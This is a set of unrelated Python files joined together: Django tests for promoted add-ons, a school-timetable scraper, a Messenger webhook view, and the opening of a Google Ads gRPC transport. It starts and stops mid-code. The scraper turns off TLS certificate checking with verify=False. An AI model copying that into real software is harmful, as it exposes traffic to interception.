    else:
        main_keys = np.sort(list(main_dict.keys()))
    main_entries = np.array([main_dict[main_key] for main_key in main_keys])
    if 'order' in other_dict.keys():
        other_keys = other_dict['order']
    else:
        other_keys = np.sort(list(other_dict.keys()))
    out_key_order =[]
    new_dict = other_dict.copy()
    replaced_keys = []
    for ikey,other_key in enumerate(other_keys):
        other_entry = new_dict[other_key]
        # Indices of main entries matching this entry's coordinates.
        ind_found = pyres_utils.match_xy(main_entries,np.array(other_entry))
        if len(ind_found)> 0:
            # Re-key the entry to the first matching main-dict key.
            old_key = new_dict.pop(other_key,None)
            replaced_keys.append([other_key,main_keys[ind_found[0]]])
            out_key_order.append(main_keys[ind_found[0]])
            new_dict[main_keys[ind_found[0]]]=main_dict[main_keys[ind_found[0]]]
        else:
            out_key_order.append(other_key)
    new_dict.update({'order':out_key_order})
    return new_dict, replaced_keys
|
|
import datetime
from unittest import mock
from django.test.utils import override_settings
from olympia import amo
from olympia.amo.tests import addon_factory, TestCase
from olympia.amo.urlresolvers import reverse
from olympia.constants import applications, promoted
from olympia.promoted.models import (
PromotedAddon, PromotedApproval, PromotedSubscription)
class TestPromotedAddon(TestCase):
    """Tests for PromotedAddon group/application/approval behavior."""

    def test_basic(self):
        """With no application set, all applications are implied."""
        promoted_addon = PromotedAddon.objects.create(
            addon=addon_factory(), group_id=promoted.SPONSORED.id)
        assert promoted_addon.group == promoted.SPONSORED
        assert promoted_addon.application_id is None
        assert promoted_addon.all_applications == [
            applications.FIREFOX, applications.ANDROID]

        promoted_addon.update(application_id=applications.FIREFOX.id)
        assert promoted_addon.all_applications == [applications.FIREFOX]

    def test_is_approved_applications(self):
        addon = addon_factory()
        promoted_addon = PromotedAddon.objects.create(
            addon=addon, group_id=promoted.LINE.id)
        assert addon.promotedaddon
        # Just having the PromotedAddon instance isn't enough
        assert addon.promotedaddon.approved_applications == []
        # the current version needs to be approved also
        promoted_addon.approve_for_version(addon.current_version)
        addon.reload()
        assert addon.promotedaddon.approved_applications == [
            applications.FIREFOX, applications.ANDROID]
        # but not if it's for a different type of promotion
        promoted_addon.update(group_id=promoted.SPONSORED.id)
        assert addon.promotedaddon.approved_applications == []
        # unless that group has an approval too
        PromotedApproval.objects.create(
            version=addon.current_version, group_id=promoted.SPONSORED.id,
            application_id=applications.FIREFOX.id)
        addon.reload()
        assert addon.promotedaddon.approved_applications == [
            applications.FIREFOX]
        # for promoted groups that don't require pre-review though, there isn't
        # a per version approval, so a current_version is sufficient and all
        # applications are seen as approved.
        promoted_addon.update(group_id=promoted.STRATEGIC.id)
        assert addon.promotedaddon.approved_applications == [
            applications.FIREFOX, applications.ANDROID]

    def test_creates_a_subscription_when_group_should_have_one(self):
        assert PromotedSubscription.objects.count() == 0

        promoted_addon = PromotedAddon.objects.create(
            addon=addon_factory(), group_id=promoted.SPONSORED.id
        )

        assert PromotedSubscription.objects.count() == 1
        assert (PromotedSubscription.objects.all()[0].promoted_addon ==
                promoted_addon)

        # Do not create a subscription twice.
        promoted_addon.save()

        assert PromotedSubscription.objects.count() == 1

    def test_no_subscription_created_when_group_should_not_have_one(self):
        assert PromotedSubscription.objects.count() == 0

        PromotedAddon.objects.create(
            addon=addon_factory(), group_id=promoted.LINE.id
        )

        assert PromotedSubscription.objects.count() == 0

    def test_auto_approves_addon_when_saved_for_immediate_approval(self):
        # empty case with no group set
        promo = PromotedAddon.objects.create(
            addon=addon_factory(), application_id=amo.FIREFOX.id)
        assert promo.group == promoted.NOT_PROMOTED
        assert promo.approved_applications == []
        assert not PromotedApproval.objects.exists()

        # first test with a group.immediate_approval == False
        promo.group_id = promoted.RECOMMENDED.id
        promo.save()
        promo.addon.reload()
        assert promo.approved_applications == []
        assert not PromotedApproval.objects.exists()
        # Bug fix: this comparison was missing `assert` and was a no-op.
        assert promo.addon.promoted_group() == promoted.NOT_PROMOTED

        # then with a group thats immediate_approval == True
        promo.group_id = promoted.SPOTLIGHT.id
        promo.save()
        promo.addon.reload()
        assert promo.approved_applications == [amo.FIREFOX]
        assert PromotedApproval.objects.count() == 1
        assert promo.addon.promoted_group() == promoted.SPOTLIGHT

        # test the edge case where the application was changed afterwards
        promo.application_id = 0
        promo.save()
        promo.addon.reload()
        assert promo.approved_applications == [amo.FIREFOX, amo.ANDROID]
        assert PromotedApproval.objects.count() == 2

    @mock.patch('olympia.lib.crypto.tasks.sign_file')
    def test_approve_for_addon(self, mock_sign_file):
        promo = PromotedAddon.objects.create(
            addon=addon_factory(version_kw={'version': '0.123a'}),
            group_id=promoted.SPOTLIGHT.id)
        file_ = promo.addon.current_version.all_files[0]
        file_.update(filename='webextension.xpi')
        with amo.tests.copy_file(
                'src/olympia/files/fixtures/files/webextension.xpi',
                file_.file_path):
            # SPOTLIGHT doesnt have special signing states so won't be resigned
            promo.addon.reload()
            # Bug fix: these comparisons were missing `assert` (no-ops).
            assert promo.addon.promoted_group() == promoted.NOT_PROMOTED
            promo.approve_for_addon()
            promo.addon.reload()
            assert promo.addon.promoted_group() == promoted.SPOTLIGHT
            assert promo.addon.current_version.version == '0.123a'
            mock_sign_file.assert_not_called()

            # VERIFIED does though.
            promo.update(group_id=promoted.VERIFIED.id)
            promo.addon.reload()
            assert promo.addon.promoted_group() == promoted.NOT_PROMOTED
            promo.approve_for_addon()
            promo.addon.reload()
            assert promo.addon.promoted_group() == promoted.VERIFIED
            assert promo.addon.current_version.version == '0.123a.1-signed'
            mock_sign_file.assert_called_with(file_)
class TestPromotedSubscription(TestCase):
    """Tests for PromotedSubscription URL building and state flags."""

    def test_get_onboarding_url_with_new_object(self):
        # An unsaved subscription has no onboarding URL yet.
        subscription = PromotedSubscription()
        assert subscription.get_onboarding_url() is None

    def test_get_relative_onboarding_url(self):
        promoted_addon = PromotedAddon.objects.create(
            addon=addon_factory(), group_id=promoted.SPONSORED.id
        )
        subscription = PromotedSubscription.objects.filter(
            promoted_addon=promoted_addon
        ).get()
        expected = reverse(
            "devhub.addons.onboarding_subscription",
            args=[subscription.promoted_addon.addon.slug],
            add_prefix=False
        )
        assert subscription.get_onboarding_url(absolute=False) == expected

    def test_get_onboarding_url(self):
        promoted_addon = PromotedAddon.objects.create(
            addon=addon_factory(), group_id=promoted.SPONSORED.id
        )
        subscription = PromotedSubscription.objects.filter(
            promoted_addon=promoted_addon
        ).get()
        external_site_url = "http://example.org"
        with override_settings(EXTERNAL_SITE_URL=external_site_url):
            url = subscription.get_onboarding_url()
            relative_path = reverse(
                "devhub.addons.onboarding_subscription",
                args=[subscription.promoted_addon.addon.slug],
                add_prefix=False
            )
            assert url == "{}{}".format(external_site_url, relative_path)
            # The URL must not be locale-prefixed.
            assert "en-US" not in url

    def test_stripe_checkout_completed(self):
        subscription = PromotedSubscription()
        assert not subscription.stripe_checkout_completed
        subscription.update(payment_completed_at=datetime.datetime.now())
        assert subscription.stripe_checkout_completed

    def test_stripe_checkout_cancelled(self):
        subscription = PromotedSubscription()
        assert not subscription.stripe_checkout_cancelled
        subscription.update(payment_cancelled_at=datetime.datetime.now())
        assert subscription.stripe_checkout_cancelled

    def test_addon_already_approved(self):
        addon = addon_factory()
        promoted_addon = PromotedAddon.objects.create(
            addon=addon, group_id=promoted.SPONSORED.id
        )
        subscription = PromotedSubscription.objects.filter(
            promoted_addon=promoted_addon
        ).get()
        assert not subscription.addon_already_promoted
        promoted_addon.approve_for_version(addon.current_version)
        subscription.reload()
        assert subscription.addon_already_promoted
|
|
#!/usr/bin/python
from bs4 import BeautifulSoup
from dbconnect import connection
import requests
import date_module
import classes
import professors
import traceback
from compiler.ast import flatten
import time
def get_html(link):
    """Fetch ``link`` and return its parsed BeautifulSoup tree.

    Returns False when the HTTP request itself fails.  The response
    encoding is taken from the page's http-equiv Content-Type meta tag
    when present, falling back to utf-8.
    """
    # TODO: Install SSL Certificate Before Production
    try:
        r = requests.get(link, verify=False)
    except requests.RequestException:
        # Narrowed from a bare except: only request failures (connection,
        # timeout, invalid URL) mean "page unavailable".
        return False
    soup = BeautifulSoup(r.text, 'html.parser')
    try:
        content = soup.find('meta', attrs={'http-equiv': 'Content-Type'})['content']
        index = content.find('=') + 1
        r.encoding = content[index:]
    except (TypeError, KeyError):
        # No meta tag (find() returned None) or no 'content' attribute.
        r.encoding = "utf-8"
    text = r.text
    html = BeautifulSoup(text, 'html.parser')
    return html
def get_tables(table_name, old_dates_count, html):
    """Return the tables with CSS class ``table_name``, skipping the first
    ``old_dates_count`` of them (already-processed dates)."""
    matching = html.find_all('table', table_name)
    return [tbl for tbl in matching[old_dates_count:]]
# Is the tag from the group that displays all days on one page or not?
def is_tag_simple(tag):
    """Tags containing '#tr' or '#su' belong to the single-page layout."""
    contains_marker = ('#tr' in tag) or ('#su' in tag)
    return contains_marker
# Does the link have ending '.htm'? If it does, then before going to changes page, we need to delete it and then append src
def get_basic_link(link):
    """Strip a trailing '/page.htm' component so a suffix can be appended."""
    if '.htm' not in link:
        return link
    return link.rsplit('/', 1)[0]
def get_final_link(basic_link, suffix):
    """Join the base link and a page suffix with a single slash."""
    return "{0}/{1}".format(basic_link, suffix)
# When every day is on another page, getting the links is a little bit difficult
def get_individual_links(html, basic_link):
    """Build full links for every <option> date that is still relevant.

    NOTE(review): ``dates`` is never appended to, so the early-break
    branch below (``len(dates) == 2 ...``) can never fire — confirm
    whether a ``dates.append(date)`` was intended after ``get_date``.
    """
    dates = []
    individual_links = []
    if html == False:
        return []
    for string_date in html.find_all('option'):
        date = date_module.get_date(string_date)
        if date_module.is_date_present(date):
            final_link = get_final_link(basic_link, string_date['value'])
            individual_links.append(final_link)
        # Dates are from newest to oldest => in this case it means there is no chance of relevant date
        # No need to go through all of them
        elif len(dates) == 2 and dates[0] < dates[1]:
            break
    return individual_links
def get_schools():
    """Return every school URL stored in the database."""
    cursor, conn = connection()
    cursor.execute("SELECT `school` FROM `schools`")
    schools = [row[0] for row in cursor.fetchall()]
    conn.close()
    return schools
def is_school_in_db(school):
    """Return True when ``school`` is already registered.

    Unknown schools are inserted before returning False, so the caller
    can treat False as "seen for the first time".
    """
    c, conn = connection()
    sql = "SELECT `school` FROM `schools` WHERE `school`=%s"
    # Bug fix: query parameters must be a one-element tuple; `(school)` is
    # just a parenthesized string, which drivers may treat as a sequence
    # of characters.
    c.execute(sql, (school,))
    result = c.fetchone()
    if result is None:
        sql = "INSERT INTO `schools` (`school`) VALUES (%s)"
        c.execute(sql, (school,))
        conn.commit()
        conn.close()
        return False
    else:
        conn.close()
        return True
def get_links(html, link):
    """Return the list of page URLs that actually hold the schedule changes.

    The start page is a frameset; its 'surrmmdd' frame either points
    directly at a single all-days page, or at a per-day layout whose
    individual links are listed in the 'suplhlav' header frame.
    """
    frame = html.find('frame', attrs={'name': 'surrmmdd'})
    try:
        src = frame['src']
    except TypeError:
        # No such frame (find() returned None): nothing to scrape.
        return []
    basic_link = get_basic_link(link)
    if is_tag_simple(src):
        # Single-page layout: the frame src is the changes page itself.
        final_link = get_final_link(basic_link, src)
        return [final_link]
    else:
        # Per-day layout: fetch the header frame and collect day links.
        head_link = html.find('frame', attrs={'name': 'suplhlav'})['src']
        # That's how it's called in the original but translated (Czech in programming sucks :/ )
        head_basic_link = basic_link + "/" + head_link
        head_html = get_html(head_basic_link)
        return get_individual_links(head_html, basic_link)
def get_index(html):
    """Return the CSS-class index suffix used by this school's pages.

    Pages name their classes like 'textnormal_1' / 'textnormal_3'; the
    first anchor's name attribute tells which variant is in use.
    """
    # FIX: Definitely need to check the values of the tags
    a = html.find('a')
    try:
        if a['name'].find('tr') != -1:
            return "1"
        else:
            return "3"
    except (TypeError, KeyError, AttributeError):
        # Narrowed from a bare except: no anchor (a is None), no 'name'
        # attribute, or a non-string attribute value all mean "variant 3".
        return "3"
def fix_tables(html, old_dates_count, index, dates):
    """Reconcile the date list with the number of change tables found.

    Some pages contain date headings ('textlarge_<index>' paragraphs)
    followed by a plain 'textnormal_<index>' paragraph instead of a table
    (e.g. a "no changes" note).  Such dates are removed from ``dates`` so
    the date list lines up with the extracted tables again.

    NOTE(review): the interaction of ``dates_number`` with
    ``old_dates_count`` and the ``len(dates) - 2`` bound is subtle —
    verify against live pages before changing it.
    """
    dates_number = old_dates_count
    for paragraph in html.body.find_all('p', recursive=False):
        try:
            # A 'textnormal' paragraph in place of a table: drop that date.
            if paragraph['class'][0] == 'textnormal_' + index and dates_number < len(dates) - 2:
                dates.pop(dates_number - 1)
                dates_number -= 1
            if len(dates) == 0:
                return dates
            # A 'textlarge' paragraph is the heading of the next date.
            if paragraph['class'][0] == 'textlarge_' + index:
                dates_number += 1
        except KeyError:
            # Paragraph without a class attribute: skip it.
            continue
    return dates
def get_data(html, school, should_compare):
    """Extract student and professor substitution data from one page.

    Delegates storage to ``classes.data`` and ``professors.data`` and
    returns the list of dates found on the page (after any reconciliation
    by ``fix_tables``).
    """
    # Indexes in names of CSS classes vary per school layout.
    index = get_index(html)
    # Getting dates and count of old ones (don't need to extract data from those)
    (dates, old_dates_count) = date_module.get_dates(html, index)
    student_tables = get_tables('tb_supltrid_' + index, old_dates_count, html)
    professor_tables = get_tables('tb_suplucit_' + index, old_dates_count, html)
    # Fewer tables than dates means some dates carry no table; drop those.
    if len(student_tables) < len(dates):
        dates = fix_tables(html, old_dates_count, index, dates)
    if len(dates) != 0 and len(student_tables) != 0:
        classes.data(html, student_tables, dates, school, should_compare)
    if len(dates) != 0 and len(professor_tables) != 0:
        professors.data(html, professor_tables, dates, school, should_compare)
    return dates
def delete_dates_not_present_for_professors(dates, school):
    """Delete this school's professor changes whose dates are no longer
    published on the website.

    ``dates`` is a (possibly nested) list of datetime.date objects still
    present online.
    """
    def _flatten(seq):
        # Local replacement for compiler.ast.flatten: that module is
        # Python-2-only and was removed in Python 3.
        flat = []
        for item in seq:
            if isinstance(item, (list, tuple)):
                flat.extend(_flatten(item))
            else:
                flat.append(item)
        return flat

    c, conn = connection()
    select = "SELECT DISTINCT professor_changes.date FROM professor_changes, professors WHERE professors.school=%s" \
             " AND professor_changes.professor_id = professors.professor_id"
    # Parameters passed as a one-element tuple (a bare string is fragile).
    c.execute(select, (school,))
    all_dates = [date[0] for date in c.fetchall()]
    dates = _flatten(dates)
    for date in all_dates:
        if date.date() not in dates:
            delete = "DELETE professor_changes FROM professor_changes JOIN professors ON professor_changes.professor_id = professors.professor_id" \
                     " WHERE professors.school=%s AND professor_changes.date=%s"
            c.execute(delete, (school, date))
            conn.commit()
    conn.close()
def delete_dates_not_present_for_clases(dates, school):
    """Delete this school's class changes whose dates are no longer
    published on the website.

    ``dates`` is a (possibly nested) list of datetime.date objects still
    present online.
    """
    def _flatten(seq):
        # Local replacement for compiler.ast.flatten: that module is
        # Python-2-only and was removed in Python 3.
        flat = []
        for item in seq:
            if isinstance(item, (list, tuple)):
                flat.extend(_flatten(item))
            else:
                flat.append(item)
        return flat

    c, conn = connection()
    select = "SELECT DISTINCT changes.date FROM changes, classes WHERE classes.school=%s" \
             " AND changes.clas_id = classes.clas_id"
    # Parameters passed as a one-element tuple (a bare string is fragile).
    c.execute(select, (school,))
    all_dates = [date[0] for date in c.fetchall()]
    dates = _flatten(dates)
    for date in all_dates:
        if date.date() not in dates:
            delete = "DELETE changes FROM changes JOIN classes ON changes.clas_id = classes.clas_id WHERE classes.school=%s" \
                     " AND changes.date=%s"
            c.execute(delete, (school, date))
            conn.commit()
    conn.close()
def get_school_data(school, should_compare):
    """Scrape one school's substitution pages and sync the database.

    ``school`` is the school's URL; ``should_compare`` is forwarded to
    the parsers to control change-notification comparison.
    """
    # Initial html given by the user
    html = get_html(school)
    # get_html returns the singleton False on request failure, so identity
    # comparison is the correct (and idiomatic) check here.
    if html is False:
        return
    if html.text == "":
        return
    # Dates that are relevant and exist on the web
    current_dates = []
    # Changes not displayed on the initial html
    if html.find('a') is None:
        # Get individual links where the changes are stored and iterate through them
        links_list = get_links(html, school)
        for link in links_list:
            html = get_html(link)
            if html is False or html.text == "":
                continue
            dates = get_data(html, school, should_compare)
            current_dates.append(dates)
    else:
        dates = get_data(html, school, should_compare)
        current_dates.append(dates)
    # Purge database rows whose dates are no longer published.
    delete_dates_not_present_for_professors(current_dates, school)
    delete_dates_not_present_for_clases(current_dates, school)
def check_school(school):
    """Register ``school`` if new and scrape it without change comparison."""
    school_is_known = is_school_in_db(school)
    if not school_is_known:
        get_school_data(school, False)
def run_scrape():
    """Run one scrape pass over all registered schools.

    Appends an incrementing "Run N" line to the log file, scrapes every
    school, and records either "Success" or the traceback of a failure.
    """
    log_path = '/home/scrape/log-file.txt'
    number = 0
    # Find the most recent "Run N" line and record the next run number.
    # (Removed an unused `timestamp` and a local `import time` that
    # shadowed the module-level import.)
    with open(log_path) as log_file:
        log_lines = list(log_file)
    for line in reversed(log_lines):
        try:
            number = int(line.rstrip().split()[-1]) + 1
            with open(log_path, 'a') as log_file:
                log_file.write("Run %d\n" % number)
            break
        except (ValueError, IndexError):
            # Line does not end with an integer: keep searching backwards.
            pass
    if number == 0:
        # No previous run found: start the log over with run 0.
        with open(log_path, 'w') as log_file:
            log_file.write("Run %d\n" % number)
    schools = get_schools()
    try:
        for school in schools:
            print(school)
            get_school_data(school, True)
        with open(log_path, 'a') as log_file:
            log_file.write("Success\n")
    except Exception:
        with open(log_path, 'a') as log_file:
            log_file.write("%s\n" % traceback.format_exc())
# Mark session => notifications will not be sent twice
# Script entry point: scrape all registered schools once.
if __name__ == "__main__":
    run_scrape()
|
|
from rest_framework.views import APIView
from permabots.models import MessengerBot, MessengerMessage
from rest_framework.response import Response
from rest_framework import status
import logging
from permabots.tasks import handle_messenger_message
from datetime import datetime
from permabots import caching
import sys
import traceback
from time import mktime
from six import iteritems
logger = logging.getLogger(__name__)
class OnlyTextMessages(Exception):
    """Raised by the webhook view to skip events with no text/postback
    payload (delivery receipts), which are not processed."""
    pass
class Resource(object):
    """Base class for Messenger webhook payload objects.

    Subclasses declare ``property_mapping`` (attribute name -> JSON key)
    and inherit symmetric ``to_json``/``from_json`` for those fields.
    """

    def to_json(self):
        """Serialize mapped attributes, skipping those that are None."""
        output_json = {}
        # dict.items() works on both Python 2 and 3, removing this class's
        # dependency on six.iteritems.
        for obj_key, json_key in self.property_mapping().items():
            attr = getattr(self, obj_key)
            if attr is not None:
                output_json[json_key] = attr
        return output_json

    @classmethod
    def from_json(cls, json):
        """Build an instance from a JSON dict, ignoring unmapped keys."""
        mapping = {v: k for k, v in cls.property_mapping().items()}
        return cls(**{mapping[key]: value for key, value in json.items() if key in mapping})

    @classmethod
    def property_mapping(cls):
        """
        A map of property name to json key name for properties that can be simply serialized to/from json
        (no objects, etc.)
        """
        raise NotImplementedError('Resource objects must define a property_mapping')
class MessengerTextMessage(Resource):
    """A plain text message received from Messenger."""

    def __init__(self, mid, seq, text):
        self.mid = mid    # Messenger message id
        self.seq = seq    # sequence number within the conversation
        self.text = text  # message body

    @classmethod
    def property_mapping(cls):
        mapping = {
            'mid': 'mid',
            'seq': 'seq',
            'text': 'text',
        }
        return mapping
class MessengerPostbackMessage(Resource):
    """A postback event (button press) received from Messenger."""

    def __init__(self, payload):
        # Developer-defined payload attached to the pressed button.
        self.payload = payload

    @classmethod
    def property_mapping(cls):
        mapping = {'payload': 'payload'}
        return mapping
class MessengerMessaging(Resource):
    """A single messaging event: a message, a postback or a delivery
    receipt.

    ``type`` is one of 'message', 'postback' or 'delivery'; ``message``
    holds the matching payload object (unset for deliveries).
    """

    def __init__(self, sender=None, recipient=None, timestamp=None, type=None, message=None):
        self.sender = sender        # Messenger id of the sending user
        self.recipient = recipient  # Messenger id of the receiving page
        self.timestamp = timestamp  # datetime of the event
        self.type = type            # 'message' | 'postback' | 'delivery'
        self.message = message      # payload object, depends on type

    @property
    def is_message(self):
        return self.type == 'message'

    @property
    def is_postback(self):
        return self.type == 'postback'

    @property
    def is_delivery(self):
        return self.type == 'delivery'

    @classmethod
    def property_mapping(cls):
        # No simply-mapped fields: to_json/from_json handle everything.
        return {}

    def to_json(self):
        output_json = super(MessengerMessaging, self).to_json()
        output_json['sender'] = {'id': self.sender}
        output_json['recipient'] = {'id': self.recipient}
        # NOTE(review): emits epoch *seconds* while from_json below parses
        # *milliseconds*, so a round-trip is asymmetric — confirm intent.
        output_json['timestamp'] = int(mktime(self.timestamp.timetuple()))
        output_json[self.type] = self.message.to_json()
        return output_json

    @classmethod
    def from_json(cls, json):
        message = super(MessengerMessaging, cls).from_json(json)
        # Messenger webhook timestamps are milliseconds since the epoch.
        if 'timestamp' in json:
            message.timestamp = datetime.fromtimestamp(json['timestamp']/1000.)
        if 'sender' in json:
            message.sender = json['sender']['id']
        if 'recipient' in json:
            message.recipient = json['recipient']['id']
        # The event type is inferred from which payload key is present.
        if 'message' in json:
            message.type = 'message'
            message.message = MessengerTextMessage.from_json(json['message'])
        elif 'postback' in json:
            message.type = 'postback'
            message.message = MessengerPostbackMessage.from_json(json['postback'])
        else:
            message.type = 'delivery'
        return message
class MessengerEntry(Resource):
    """One webhook entry: a page id, a timestamp and its messaging events."""

    def __init__(self, page_id, time=None, messaging=None):
        self.page_id = page_id
        self.time = time
        self.messaging = messaging

    @classmethod
    def property_mapping(cls):
        return {
            'page_id': 'id',
        }

    def to_json(self):
        serialized = super(MessengerEntry, self).to_json()
        serialized['time'] = int(mktime(self.time.timetuple()))
        serialized['messaging'] = [event.to_json() for event in self.messaging]
        return serialized

    @classmethod
    def from_json(cls, json):
        entry = super(MessengerEntry, cls).from_json(json)
        # Webhook times arrive as milliseconds since the epoch.
        if 'time' in json:
            entry.time = datetime.fromtimestamp(json['time']/1000.)
        if 'messaging' in json:
            entry.messaging = [MessengerMessaging.from_json(event)
                               for event in json['messaging']]
        return entry
class Webhook(Resource):
    """Top-level Messenger webhook payload: a list of page entries.

    NOTE(review): the ``object`` constructor argument (populated by
    from_json via the 'object' mapping) is accepted but never stored, and
    ``entries`` stays None when the payload lacks an 'entry' key — callers
    iterating ``entries`` should be aware.
    """

    def __init__(self, object, entries=None):
        self.entries = entries

    def to_json(self):
        # The 'object' field is always serialized as the literal "page".
        output_json = {'object': "page",
                       'entry': [entry.to_json() for entry in self.entries]}
        return output_json

    @classmethod
    def from_json(cls, json):
        webhook = super(Webhook, cls).from_json(json)
        if 'entry' in json:
            webhook.entries = [MessengerEntry.from_json(entry) for entry in json['entry']]
        return webhook

    @classmethod
    def property_mapping(cls):
        return {
            'object': 'object',
        }
class MessengerHookView(APIView):
    """
    View for Facebook Messenger webhook
    """

    def get(self, request, hook_id):
        """
        Verify token when configuring webhook from facebook dev.
        MessengerBot.id is used for verification
        """
        try:
            bot = caching.get_or_set(MessengerBot, hook_id)
        except MessengerBot.DoesNotExist:
            logger.warning("Hook id %s not associated to a bot" % hook_id)
            return Response(status=status.HTTP_404_NOT_FOUND)
        if request.query_params.get('hub.verify_token') == str(bot.id):
            # Echo the challenge back as an int, as Facebook expects.
            return Response(int(request.query_params.get('hub.challenge')))
        return Response('Error, wrong validation token')

    def create_message(self, webhook_message, bot):
        """Persist one webhook messaging event as a MessengerMessage.

        get_or_create keeps retried webhook deliveries idempotent.
        """
        if webhook_message.is_message:
            type = MessengerMessage.MESSAGE
            text = webhook_message.message.text
            postback = None
        else:
            type = MessengerMessage.POSTBACK
            text = None
            postback = webhook_message.message.payload
        message, _ = MessengerMessage.objects.get_or_create(bot=bot,
                                                            sender=webhook_message.sender,
                                                            recipient=webhook_message.recipient,
                                                            timestamp=webhook_message.timestamp,
                                                            type=type,
                                                            text=text,
                                                            postback=postback)
        caching.set(message)
        return message

    def post(self, request, hook_id):
        """
        Process Messenger webhook.
        1. Get an enabled Messenger bot
        3. For each message serialize
        4. For each message create :class:`MessengerMessage <permabots.models.messenger_api.MessengerMessage>`
        5. Delay processing of each message to a task
        6. Response provider
        """
        try:
            bot = caching.get_or_set(MessengerBot, hook_id)
        except MessengerBot.DoesNotExist:
            logger.warning("Hook id %s not associated to a bot" % hook_id)
            return Response(status=status.HTTP_404_NOT_FOUND)
        logger.debug("Messenger Bot %s attending request %s" % (bot, request.data))
        webhook = Webhook.from_json(request.data)
        for webhook_entry in webhook.entries:
            for webhook_message in webhook_entry.messaging:
                try:
                    if webhook_message.is_delivery:
                        raise OnlyTextMessages
                    message = self.create_message(webhook_message, bot)
                    if bot.enabled:
                        logger.debug("Messenger Bot %s attending request %s" % (bot, message))
                        handle_messenger_message.delay(message.id, bot.id)
                    else:
                        logger.error("Message %s ignored by disabled bot %s" % (message, bot))
                except OnlyTextMessages:
                    # Bug fix: log the incoming webhook event; `message` was
                    # unbound here when a delivery receipt raised before
                    # create_message() ran.
                    logger.warning("Not text message %s for bot %s" % (webhook_message, hook_id))
                except Exception:
                    # Narrowed from a bare except so system-exiting
                    # exceptions are not swallowed.
                    exc_info = sys.exc_info()
                    traceback.print_exception(*exc_info)
                    logger.error("Error processing %s for bot %s" % (webhook_message, hook_id))
                    return Response(status=status.HTTP_500_INTERNAL_SERVER_ERROR)
        return Response(status=status.HTTP_200_OK)
|
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import warnings
from typing import Callable, Dict, Optional, Sequence, Tuple
from google.api_core import grpc_helpers
from google.api_core import operations_v1
from google.api_core import gapic_v1
import google.auth # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
import grpc # type: ignore
from google.ads.googleads.v9.resources.types import offline_user_data_job
from google.ads.googleads.v9.services.types import offline_user_data_job_service
from google.longrunning import operations_pb2 # type: ignore
from .base import OfflineUserDataJobServiceTransport, DEFAULT_CLIENT_INFO
class OfflineUserDataJobServiceGrpcTransport(
OfflineUserDataJobServiceTransport
):
"""gRPC backend transport for OfflineUserDataJobService.
Service to manage offline user data jobs.
This class defines the same methods as the primary client, so the
primary client can load the underlying transport implementation
and call it.
It sends protocol buffers over the wire using gRPC (which is built on
top of HTTP/2); the ``grpcio`` package must be installed.
"""
def __init__(
self,
*,
host: str = "googleads.googleapis.com",
credentials: ga_credentials.Credentials = None,
credentials_file: str = None,
scopes: Sequence[str] = None,
channel: grpc.Channel = None,
api_mtls_endpoint: str = None,
client_cert_source: Callable[[], Tuple[bytes, bytes]] = None,
ssl_channel_credentials: grpc.ChannelCredentials = None,
quota_project_id: Optional[str] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
This argument is ignored if ``channel`` is provided.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
scopes (Optional(Sequence[str])): A list of scopes. This argument is
ignored if ``channel`` is provided.
channel (Optional[grpc.Channel]): A ``Channel`` instance through
which to make calls.
api_mtls_endpoint (Optional[str]): Deprecated. The mutual TLS endpoint.
If provided, it overrides the ``host`` argument and tries to create
a mutual TLS channel with client SSL credentials from
``client_cert_source`` or application default SSL credentials.
client_cert_source (Optional[Callable[[], Tuple[bytes, bytes]]]):
Deprecated. A callback to provide client SSL certificate bytes and
private key bytes, both in PEM format. It is ignored if
``api_mtls_endpoint`` is None.
ssl_channel_credentials (grpc.ChannelCredentials): SSL credentials
for grpc channel. It is ignored if ``channel`` is provided.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
"""
self._ssl_channel_credentials = ssl_channel_credentials
if channel:
# Sanity check: Ensure that channel and credentials are not both
# provided.
credentials = False
# If a channel was explicitly provided, set it.
self._grpc_channel = channel
self._ssl_channel_credentials = None
elif api_mtls_endpoint:
warnings.warn(
"api_mtls_endpoint and client_cert_source are deprecated",
DeprecationWarning,
)
host = (
api_mtls_endpoint
if ":" in api_mtls_endpoint
else api_mtls_endpoint + ":443"
)
if credentials is None:
credentials, _ = google.auth.default(
scopes=self.AUTH_SCOPES, quota_project_id=quota_project_id
)
# Create SSL credentials with client_cert_source or application
# default SSL credentials.
if client_cert_source:
cert, key = client_cert_source()
ssl_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
else:
ssl_credentials = SslCredentials().ssl_credentials
# create a new channel. The provided one is ignored.
self._grpc_channel = type(self).create_channel(
host,
credentials=credentials,
credentials_file=credentials_file,
ssl_credentials=ssl_credentials,
scopes=scopes or self.AUTH_SCOPES,
quota_project_id=quota_project_id,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
self._ssl_channel_credentials = ssl_credentials
else:
host = host if ":" in host else host + ":443"
if credentials is None:
credentials, _ = google.auth.default(scopes=self.AUTH_SCOPES)
# create a new channel. The provided one is ignored.
self._grpc_channel = type(self).create_channel(
host,
credentials=credentials,
ssl_credentials=ssl_channel_credentials,
scopes=self.AUTH_SCOPES,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
self._stubs = {} # type: Dict[str, Callable]
# Run the base constructor.
super().__init__(
host=host, credentials=credentials, client_info=client_info,
